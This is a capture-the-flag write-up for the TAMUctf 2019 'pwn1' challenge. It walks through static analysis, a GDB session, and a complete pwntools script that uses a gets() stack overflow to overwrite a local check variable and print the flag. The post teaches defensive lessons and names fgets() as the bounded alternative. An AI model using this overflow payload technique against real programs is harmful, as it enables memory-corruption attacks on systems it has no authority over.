Security CTF - Nightmare Module 04 - tamu19_pwn1
Introduction
We are continuing to work through the Capture the Flag (CTF) challenges collected in the Nightmare repo.
Today we tackle Module 04’s tamu19_pwn1 challenge. This was part of Texas A&M University’s Cybersecurity Center TAMUctf 2019 event.
For more information on what security CTFs are all about, check out this intro video.
Tools
- Linux file command
- checksec utility (pwntools implementation of checksec.sh)
- Ghidra disassembler/decompiler
- pwntools scripting framework
- gdb debugger w/GEF extension
tamu19_pwn1
Our target for this challenge is a program named pwn1.
We begin by gathering some information about the file.
file command
ctf@ctf2204:tamu19_pwn1$ file pwn1
pwn1: ELF 32-bit LSB pie executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=d126d8e3812dd7aa1accb16feac888c99841f504, not stripped
We are looking at a 32-bit x86 ELF executable that is dynamically linked and whose symbol information has not been stripped.
Note that if you’re following along on a modern 64-bit Linux system, you may need to enable the 32-bit architecture in order to run this binary.
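The fields that file reports come straight from the first few bytes of the ELF header. As a rough illustration, here is a minimal Python sketch that decodes a handful of them. The function name describe_elf and the hand-built sample header are my own for illustration and are not part of the challenge; the sketch only knows about the few field values listed in its tables.

```python
import struct

# Small lookup tables covering only the values relevant to this writeup
ELF_TYPES = {1: "ET_REL", 2: "ET_EXEC", 3: "ET_DYN (PIE or shared object)", 4: "ET_CORE"}
ELF_MACHINES = {3: "Intel 80386", 62: "x86-64"}

def describe_elf(header: bytes) -> dict:
    """Decode a few fields from the first 20 bytes of an ELF file."""
    if len(header) < 20 or header[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    ei_class = {1: "32-bit", 2: "64-bit"}.get(header[4], "unknown")
    ei_data = {1: "LSB", 2: "MSB"}.get(header[5], "unknown")
    endian = "<" if header[5] == 1 else ">"
    # e_type and e_machine are 16-bit fields right after the 16-byte e_ident
    e_type, e_machine = struct.unpack_from(endian + "HH", header, 16)
    return {
        "class": ei_class,
        "data": ei_data,
        "type": ELF_TYPES.get(e_type, hex(e_type)),
        "machine": ELF_MACHINES.get(e_machine, hex(e_machine)),
    }

# Hand-built header resembling pwn1: 32-bit, little-endian, ET_DYN, EM_386
sample = b"\x7fELF" + bytes([1, 1, 1, 0]) + bytes(8) + struct.pack("<HH", 3, 3)
print(describe_elf(sample))
```

To try it against the real binary, pass it the first 20 bytes of the file, for example describe_elf(open("pwn1", "rb").read(20)).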
checksec
ctf@ctf2204:tamu19_pwn1$ checksec pwn1
[*] '/home/ctf/projects/nightmare/modules/04-bof_variable/tamu19_pwn1/pwn1'
    Arch:     i386-32-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled
In terms of protections enabled on this binary, there is no stack canary, Full RELRO and a non-executable stack (NX/DEP) are enabled, and the program is compiled as a position-independent executable.
However, as we will see below, none of these really impact our solution to this challenge. It’s still good to get familiar with identifying the protections that are enabled.
Sample Execution
ctf@ctf2204:tamu19_pwn1$ ./pwn1
Stop! Who would cross the Bridge of Death must answer me these questions three, ere the other side he see.
What... is your name?
ASDF
I don't know that! Auuuuuuuugh!
ctf@ctf2204:tamu19_pwn1$
When run, the program prints some Monty Python-inspired intro text and then prompts the user for input (the ‘ASDF’ above).
No indication is given of the expected answers so we will need to analyze the executable to gather that information.
Note that when examining a binary from an untrusted source, suspected malware for example, we need to be very cautious about running the executable. It should be done in an isolated and disposable environment. For the purposes of this writeup all execution of the target executable is done in a disposable VM.
strings command
ctf@ctf2204:tamu19_pwn1$ strings pwn1
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
exit

... SNIP FOR BREVITY ...

Right. Off you go.
flag.txt
Stop! Who would cross the Bridge of Death must answer me these questions three, ere the other side he see.
What... is your name?
Sir Lancelot of Camelot
I don't know that! Auuuuuuuugh!
What... is your quest?
To seek the Holy Grail.
What... is my secret?
;*2$"
GCC: (Ubuntu 7.3.0-27ubuntu1~18.04) 7.3.0

... SNIP FOR BREVITY ...
The strings command allows us to get some quick insights into the program by dumping all sequences of human-readable characters (longer than a certain threshold) contained within the binary.
It’s not infallible but it’s a good starting point for analysis. Note that not everything it produces is necessarily strings output to the user in the program. As you can see above it has library names, compiler version info, etc… You need to sift through for the stuff that seems contextually relevant.
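To make the idea concrete, here is a minimal Python sketch of what strings does under the hood: scan the raw bytes for runs of printable ASCII of at least some minimum length. The function name extract_strings and the sample blob are made up for illustration, and the real tool handles more cases (other encodings, tab characters, section selection) than this sketch does.

```python
import re

def extract_strings(data: bytes, min_len: int = 4) -> list:
    """Return runs of printable ASCII (0x20-0x7e) at least min_len bytes long."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pattern.finditer(data)]

# Made-up blob mixing binary junk with two strings we saw in the real output
blob = b"\x00\x01Sir Lancelot of Camelot\x00\x7f\x02ab\x00flag.txt\x00"
found = extract_strings(blob)
print(found)
```

Runs shorter than the threshold (the two-byte "ab" here) are dropped, which is why strings output is mostly readable rather than a wall of noise.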
Near the end of the command output above we see some strings we recognize from the program execution, along with several others we didn’t see in the sample execution.
“Sir Lancelot of Camelot” and “To seek the Holy Grail.” look like pretty good answers to the first two questions.
Sample Execution 2 - Testing Answers
ctf@ctf2204:tamu19_pwn1$ ./pwn1
Stop! Who would cross the Bridge of Death must answer me these questions three, ere the other side he see.
What... is your name?
Sir Lancelot of Camelot
What... is your quest?
To seek the Holy Grail.
What... is my secret?
ASDF
I don't know that! Auuuuuuuugh!
We’ve successfully answered the first two questions using the information gleaned from the strings command. Hurray for low-hanging fruit.
But we don’t know the secret.
Let’s crack open the executable in Ghidra and examine what the code is actually doing.
Ghidra Decompiler Listing - main()
1undefined4 main(void)
2{
3 int stringCompareResult;
4 char inputBuffer [43];
5 uint checkValue;
6 undefined4 local_14;
7 undefined *local_10;
8
9 local_10 = &stack0x00000004;
10 setvbuf(_stdout,(char *)0x2,0,0);
11 local_14 = 2;
12
13 checkValue = 0;
14
15 puts("Stop! Who would cross the Bridge of Death must answer me these questions three, ere the other side he see.");
16 puts("What... is your name?");
17
18 fgets(inputBuffer,0x2b,_stdin);
19
20 stringCompareResult = strcmp(inputBuffer,"Sir Lancelot of Camelot\n");
21 if (stringCompareResult != 0) {
22 puts("I don\'t know that! Auuuuuuuugh!");
23 /* WARNING: Subroutine does not return */
24 exit(0);
25 }
26
27 puts("What... is your quest?");
28
29 fgets(inputBuffer,0x2b,_stdin);
30
31 stringCompareResult = strcmp(inputBuffer,"To seek the Holy Grail.\n");
32 if (stringCompareResult != 0) {
33 puts("I don\'t know that! Auuuuuuuugh!");
34 /* WARNING: Subroutine does not return */
35 exit(0);
36 }
37
38 puts("What... is my secret?");
39
40 gets(inputBuffer);
41 if (checkValue == 0xdea110c8) {
42 print_flag();
43 }
44 else {
45 puts("I don\'t know that! Auuuuuuuugh!");
46 }
47
48 return 0;
49}
Pretty straightforward.
The puts() function is used throughout main() to output text to the console. The intro text is displayed and then the program proceeds to sequentially prompt the user with a question and read their response from stdin into a stack-allocated input buffer. The first two questions use fgets() to read input while the third question uses gets().
After each of the first two questions & answers the user’s input is compared against the hardcoded answer string using strcmp(). The comparison result is stored in a local variable and used in an if statement to branch on whether the user successfully answered the question or not. If yes, execution continues sequentially. If no, the failure message is displayed and the program exits immediately.
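One detail worth noticing in the decompiled code is that the hardcoded answers end in "\n". fgets() keeps the newline the user typed, so the comparison only succeeds if the newline is there. Here is a small Python model of that behaviour, using io.BytesIO as a stand-in for stdin. The helper name fgets_model is hypothetical and this is only a sketch of the semantics, not of the C implementation.

```python
import io

def fgets_model(stream, count: int) -> bytes:
    """Model of C fgets(buf, count, stream): read at most count-1 bytes,
    stopping after a newline, which is kept in the result."""
    return stream.readline(count - 1)

# Simulated stdin holding both answers, each terminated by Enter
fake_stdin = io.BytesIO(b"Sir Lancelot of Camelot\nTo seek the Holy Grail.\n")

first = fgets_model(fake_stdin, 0x2b)
second = fgets_model(fake_stdin, 0x2b)
print(first == b"Sir Lancelot of Camelot\n")   # newline is part of the match
print(second == b"To seek the Holy Grail.\n")

# An over-long line is cut off at count-1 = 42 bytes
long_line = fgets_model(io.BytesIO(b"A" * 100 + b"\n"), 0x2b)
print(len(long_line))
```

This is also why sending the answer followed by a newline (which is what pressing Enter does) is required when driving the program from a script.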
The third question is different. After reading the user’s answer into the input buffer, an if statement checks a different local variable, unrelated to the user’s input, for equality to the hardcoded hex value 0xdea110c8. If the local variable is equal to 0xdea110c8 the function print_flag() is called. If not the failure message is printed and execution flows through to main()’s return statement.
Ghidra Decompiler Listing - print_flag()
void print_flag(void)
{
  FILE *__fp;
  int iVar1;

  puts("Right. Off you go.");
  __fp = fopen("flag.txt","r");
  while( true ) {
    iVar1 = _IO_getc(__fp);
    if ((char)iVar1 == -1) break;
    putchar((int)(char)iVar1);
  }
  putchar(10);
  return;
}
The function simply opens the file “flag.txt”, reads it character by character and writes each character to stdout, followed by a line feed.
Note that the flag.txt file is in the same directory as the pwn1 executable. When working through this on your local machine you could just open this file to find the flag, but that defeats the purpose of trying to learn about this stuff. And in real CTF events you’re likely connecting to remote hosts and interacting with the programs remotely.
Analysis
We have several reads of input into a stack allocated variable.
On main() Line 18 and Line 29 above, fgets() reads at most 42 bytes (count - 1) into the inputBuffer variable’s memory and then appends a null terminator byte, for a maximum of 43 bytes. inputBuffer is declared as 43 bytes long (Line 4) so these are correctly bounded memory writes.
On Line 40 gets() writes an unlimited number of bytes into inputBuffer. However many characters the user provides as an answer to the third question are written to memory starting at inputBuffer’s address, followed by a null terminator. If the user provides more than 42 characters, the input plus its terminator no longer fits in the 43 bytes set aside for it and we’re overflowing into other stack memory.
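We can model this overflow with a toy Python sketch before touching the debugger. The sketch assumes that checkValue sits immediately after the 43-byte inputBuffer in memory, which is what the decompiler’s variable order suggests and what the debugger session later in this post confirms. The names gets_model, fresh_stack and check_value are my own, and a bytearray is obviously a very simplified stand-in for a real stack frame.

```python
import struct

BUF_SIZE = 43  # char inputBuffer[43]

def fresh_stack() -> bytearray:
    """43 bytes of inputBuffer followed by the 4-byte checkValue, all zeroed."""
    return bytearray(BUF_SIZE + 4)

def gets_model(memory: bytearray, line: bytes) -> None:
    """Model of gets(): copy the whole line plus a NUL byte, with no bounds check."""
    data = line + b"\x00"
    if len(data) > len(memory):
        # Model the write spilling further into neighbouring stack memory
        memory.extend(bytes(len(data) - len(memory)))
    memory[0:len(data)] = data

def check_value(memory: bytearray) -> int:
    """Read checkValue as a little-endian 32-bit integer."""
    return struct.unpack_from("<I", memory, BUF_SIZE)[0]

safe = fresh_stack()
gets_model(safe, b"A" * 42)            # 42 chars + NUL fits exactly
print(hex(check_value(safe)))

smashed = fresh_stack()
gets_model(smashed, b"A" * 43 + b"BBBB")
print(hex(check_value(smashed)))
```

With 42 characters checkValue stays zero. With 43 characters of padding followed by "BBBB", the four B bytes land exactly on checkValue.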
We can examine this happening with a debugger.
Dynamic Analysis with GDB
1ctf@ctf2204:tamu19_pwn1$ gdb ./pwn1
2Reading symbols from ./pwn1...
3(No debugging symbols found in ./pwn1)
4
5gef➤ disas *main+298, *main+361
6Dump of assembler code from 0x565558a3 to 0x565558e2:
7 0x565558a3 <main+298>: sub esp,0xc
8 0x565558a6 <main+301>: lea eax,[ebp-0x3b]
9 0x565558a9 <main+304>: push eax
10 0x565558aa <main+305>: call 0x56555520 <gets@plt>
11 0x565558af <main+310>: add esp,0x10
12 0x565558b2 <main+313>: cmp DWORD PTR [ebp-0x10],0xdea110c8
13 0x565558b9 <main+320>: jne 0x565558c2 <main+329>
14 0x565558bb <main+322>: call 0x565556fd <print_flag>
15 0x565558c0 <main+327>: jmp 0x565558d4 <main+347>
16 0x565558c2 <main+329>: sub esp,0xc
17 0x565558c5 <main+332>: lea eax,[ebx-0x1584]
18 0x565558cb <main+338>: push eax
19 0x565558cc <main+339>: call 0x56555550 <puts@plt>
20 0x565558d1 <main+344>: add esp,0x10
21 0x565558d4 <main+347>: mov eax,0x0
22 0x565558d9 <main+352>: lea esp,[ebp-0x8]
23 0x565558dc <main+355>: pop ecx
24 0x565558dd <main+356>: pop ebx
25 0x565558de <main+357>: pop ebp
26 0x565558df <main+358>: lea esp,[ecx-0x4]
27End of assembler dump.
28
29gef➤ b *main+310
30Breakpoint 1 at 0x8af
31
32gef➤ x/xw $ebp-0x10
330xffffd458: 0x00000000
34
35gef➤ r
Above we launch gdb and get oriented to investigate the pwn1 executable with the debugger.
Line 1: Launch gdb and open the pwn1 executable
Line 5: Display the disassembly of main(), showing instructions between address main+298 and main+361. This segment of main() contains the gets() call used to get user input for the “What…is my secret?” question.
Line 10: We see the CALL instruction to gets() at address main+305 of our executable. Note that just before the CALL instruction, at main+304, the eax register is pushed onto the stack. On 32-bit x86 Linux, function arguments are passed on the stack. We can infer that this eax value at the top of the stack when CALL occurs is the first argument to gets(), i.e. the location of the input buffer to read input into.
Line 12: The second instruction after the gets() call is the comparison between the checkValue local variable we saw in the decompiler output earlier and the hard-coded value 0xdea110c8. Notice that in the assembly code the local checkValue variable is simply referred to by ebp-0x10. This is an offset relative to the base frame pointer of the current stack frame and is a common notation for referencing local variables. The CMP instruction compares the values and sets the flags used by the subsequent JNE (jump if not equal) instruction.
Line 29: Here we set a breakpoint just after the call to gets() has completed. This will allow us to examine where the input we have provided has landed in memory and confirm that we will be able to overwrite the variable checkValue.
Line 32: Check what ebp-0x10 actually resolves to as an absolute address in the process memory. This is where the value of the checkValue variable is stored. Recall that this variable is used in the if statement to decide whether the print_flag() function will be called. Note that this address represented by ebp-0x10 will not always be the same value on different machines, and even on different runs of the same program on the same machine. This is due to the Address Space Layout Randomization security feature (ASLR). The checkValue variable will always be located at ebp-0x10 … but the actual address represented by that offset from the ebp register can differ.
Line 35: With our breakpoint configured we now run the program.
The program will execute normally under GDB and we will be prompted with the same 3 questions as the sample executions shown above. To reach the “What…is my secret?” question we must answer the first two questions correctly. For the third question, the one with a buffer overflow vulnerability due to its use of gets(), we enter a sequence of 43 “A” characters followed by 4 “B” characters. This should entirely fill up the input buffer memory with “A”, and the subsequent 4 “B” characters should overwrite the memory used by the checkValue variable.
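The 43-byte padding length falls straight out of the two ebp offsets in the disassembly: the buffer passed to gets() starts at ebp-0x3b and checkValue lives at ebp-0x10. A quick Python sketch of the arithmetic (the constant names are mine):

```python
BUFFER_EBP_OFFSET = 0x3b  # lea eax,[ebp-0x3b] just before the gets() call
CHECK_EBP_OFFSET = 0x10   # cmp DWORD PTR [ebp-0x10],0xdea110c8

# Distance in bytes from the start of inputBuffer to checkValue
padding_len = BUFFER_EBP_OFFSET - CHECK_EBP_OFFSET
print(padding_len)

# The test input: padding to reach checkValue, then 4 marker bytes
test_input = b"A" * padding_len + b"B" * 4
print(test_input.decode())
```

The distance matches the 43-byte size Ghidra reported for inputBuffer, so nothing sits between the buffer and checkValue.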
In the listing below the program has just halted at the breakpoint on main+310 just after the gets() call has completed and written our input to memory.
1gef➤ registers $eip $esp $ebp $eax
2$eax : 0xffffd42d → "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB"
3$esp : 0xffffd410 → 0xffffd42d → "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB"
4$ebp : 0xffffd468 → 0xf7ffd020 → 0xf7ffda40 → 0x56555000 → jg 0x56555047
5$eip : 0x565558af → <main+310> add esp, 0x10
6
7gef➤ hexdump dword $esp --size 24
80xffffd410│+0x0000 0xffffd42d
90xffffd414│+0x0004 0x56555a63
100xffffd418│+0x0008 0xf7fad620
110xffffd41c│+0x000c 0x00000000
120xffffd420│+0x0010 0x00000000
130xffffd424│+0x0014 0x00000000
140xffffd428│+0x0018 0x01000000
150xffffd42c│+0x001c 0x41414109
160xffffd430│+0x0020 0x41414141
170xffffd434│+0x0024 0x41414141
180xffffd438│+0x0028 0x41414141
190xffffd43c│+0x002c 0x41414141
200xffffd440│+0x0030 0x41414141
210xffffd444│+0x0034 0x41414141
220xffffd448│+0x0038 0x41414141
230xffffd44c│+0x003c 0x41414141
240xffffd450│+0x0040 0x41414141
250xffffd454│+0x0044 0x41414141
260xffffd458│+0x0048 0x42424242
270xffffd45c│+0x004c 0x00000000
280xffffd460│+0x0050 0xffffd480
290xffffd464│+0x0054 0xf7fad000
300xffffd468│+0x0058 0xf7ffd020
310xffffd46c│+0x005c 0xf7da8519
32
33gef➤ hexdump byte --size 0x30 0xffffd42d
340xffffd42d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
350xffffd43d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
360xffffd44d 41 41 41 41 41 41 41 41 41 41 41 42 42 42 42 00 AAAAAAAAAAABBBB.
37
38gef➤ x/xw $ebp-0x10
390xffffd458: 0x42424242
Line 1: We display a few of the CPU registers to orient ourselves. eax still contains the value that was pushed to the stack prior to the gets() call (0xffffd42d). esp points to the top of the stack (0xffffd410), and stored at that address is the same value (0xffffd42d). It was pushed to the stack immediately before the gets() call and is the address of the inputBuffer variable, which is where our input is written. ebp is our base frame pointer. The actual value here isn’t super important, but remember we use the ebp value, along with an offset, to calculate the address of the checkValue variable. eip is the instruction pointer and tells us which instruction we are currently halted on. This is the ADD instruction right after the CALL to gets().
Line 7: We examine the process’s stack memory. Starting at the address stored in esp we display 24 double words (i.e. 4-byte values). Line 8 shows address 0xffffd410, which is the current top of the stack. Since we’re halted right after the gets() call we know that the value stored here is the argument to the gets() call, i.e. the address of inputBuffer, which we can see is 0xffffd42d. If we check out the memory there we should see the bytes that represent the string we entered as a response to the third question.
Lines 15-26: Here we see the actual memory allocated for inputBuffer on the stack. Line 15 begins at address 0xffffd42c, which is one byte before inputBuffer’s start. Because x86 is little-endian, the dword 0x41414109 shown there is the byte 0x09 at 0xffffd42c followed by three 0x41 bytes starting at 0xffffd42d. In the right-most column of the hexdump we see a long sequence of bytes with the value 41. Hex 41 is the ASCII code for the character ‘A’, which we provided as the answer to the third question. At the end of this range, Line 26 shows memory address 0xffffd458. Recall from the previous listing that our checkValue variable, referred to in assembly code as ebp-0x10, is stored at 0xffffd458. And here we see that the value at 0xffffd458 is now 0x42424242. Hex 42 is the value of the ASCII character ‘B’. This confirms that we have successfully overwritten the checkValue variable with our B characters.
Line 33: We look at 48 bytes starting at the beginning of inputBuffer memory (0xffffd42d). In this view we see the actual ASCII characters in the right-most column. We see our string of A’s followed by four B’s. This reconfirms what we saw in the previous hex dump.
Line 38: As we did in the prior listing, before hitting our breakpoint, we examine the memory at ebp-0x10. This confirms that it now holds the value 0x42424242. So when the if statement determining whether to call print_flag() executes, the value 0x42424242 will be compared to 0xdea110c8. The key point here is that we have confirmed that we can control the value of checkValue with our input as a result of the buffer overflow. All that remains is to plant the specific value we need (0xdea110c8) there instead of a series of test characters.
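Planting 0xdea110c8 means sending its four bytes in the order the CPU expects to find them in memory. x86 is little-endian, so the least significant byte goes first. Here is a small sketch using only Python’s standard struct module; the variable names are my own.

```python
import struct

CHECKED_VALUE = 0xdea110c8

# "<I" = little-endian unsigned 32-bit integer
packed = struct.pack("<I", CHECKED_VALUE)
print(packed.hex())

# 43 bytes of padding to reach checkValue, then the packed value
payload = b"A" * 43 + packed

# Reading the 4 bytes back the way the CMP instruction would see them
recovered = struct.unpack("<I", payload[43:47])[0]
print(hex(recovered))

# gets() stops reading at a newline, so the payload must not contain one
print(b"\n" in payload)
```

The last check matters because gets() stops at the first newline (0x0a). None of the bytes in this value is a newline, so the whole payload gets through.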
Exploitation
At this stage we’ve located the vulnerability and figured out how to exploit it.
Using pwntools we can wrap it all together into a simple, automated script to drive input to the pwn1 executable, exploit it and display the flag.
I’ve commented the script below but if anything is unclear I’d recommend looking through the pwntools documentation.
#!/usr/bin/env python3

from pwn import *
import os

# Some pwntools framework configuration variables
context.terminal = ["tmux", "new-window"]
context.arch = 'i386'
context.bits = 32
context.os = 'linux'

# Correct answers to first two questions
CORRECT_1ST_ANSWER = b"Sir Lancelot of Camelot"
CORRECT_2ND_ANSWER = b"To seek the Holy Grail."

# The value we want to set checkValue to in pwn1's process memory
CHECKED_VALUE = 0xdea110c8

# Set up our input payload for the third question
padding = b"A"*43 # 43 'junk' bytes to fill up the inputBuffer memory
packed_payload = p32(CHECKED_VALUE) # the value we want to plant, packed little-endian
exploit_payload = padding + packed_payload

log.info("pwntools script's PID: {}".format(os.getpid()))

# start the process under gdb for debugging
"""
io = gdb.debug("./pwn1", gdbscript='''
    set follow-fork-mode child
    b *main+313
    continue
    ''')
"""

# execute process directly
# interact with its stdin/stdout programmatically using the returned
# object
io = process("./pwn1")

log.info("pwn1 process stdout:")
print(io.recv().decode())

# sendline() appends the newline that the program's strcmp() calls expect
log.info("Sending Correct First Answer: '{0}'".format(CORRECT_1ST_ANSWER.decode()))
io.sendline(CORRECT_1ST_ANSWER)

log.info("pwn1 process stdout:")
print(io.recv().decode())

log.info("Sending Correct Second Answer: '{0}'".format(CORRECT_2ND_ANSWER.decode()))
io.sendline(CORRECT_2ND_ANSWER)
log.info("pwn1 process stdout:")
print(io.recv().decode())

log.info("Sending exploit payload...")
io.sendline(exploit_payload)
log.info("pwn1 process stdout:")
print(io.recv().decode())

io.interactive()
And here is a sample run of the exploit script. At Lines 19-20 we see the output of the print_flag() function having been called rather than the failure message “I don’t know that! Auuuuuuuugh!” that we saw displayed in our sample runs of the program at the start of this post.
We’ve successfully altered the execution flow of the if statement to make the program call print_flag().
1ctf@ctf2204:tamu19_pwn1$ ./tamu19_pwn1_exploit.py
2[*] pwntools script's PID: 1881
3[x] Starting local process './pwn1'
4[+] Starting local process './pwn1': pid 1884
5[*] pwn1 process stdout:
6Stop! Who would cross the Bridge of Death must answer me these questions three, ere the other side he see.
7What... is your name?
8
9[*] Sending Correct First Answer: 'Sir Lancelot of Camelot'
10[*] pwn1 process stdout:
11What... is your quest?
12
13[*] Sending Correct Second Answer: 'To seek the Holy Grail.'
14[*] pwn1 process stdout:
15What... is my secret?
16
17[*] Sending exploit payload...
18[*] pwn1 process stdout:
19Right. Off you go.
20flag{g0ttem_b0yz}
21
22
23[*] Switching to interactive mode
24[*] Process './pwn1' stopped with exit code 0 (pid 1884)
25[*] Got EOF while reading in interactive
26$ q
27[*] Got EOF while sending in interactive
Conclusion
This one is another very basic example of a buffer overflow. The pwn1 executable already contains the functionality we want (i.e. the print_flag() function) and a conditional statement to decide whether to execute that functionality. We are simply using our buffer overflow to alter the variable used in the conditional statement.
The root cause of the buffer overflow in this example is the use of gets() to read the user’s answer to the third question. gets() takes only one argument: a pointer to the memory where it will write the bytes. It does not permit specifying a maximum number of bytes to read. For this reason the fgets() function, as used in the first two questions, is considered a more secure option because it takes a second argument that bounds how many bytes are written to the buffer.
In more advanced cases we will not only use buffer overflows to control the values in process memory and redirect execution … but also to inject new functionality of our choosing (i.e. shellcode). But there will be obstacles to overcome along the way in the form of security protections like ASLR, DEP/NX, etc…
Stay tuned for that and more as I work through the Nightmare repo’s CTF examples.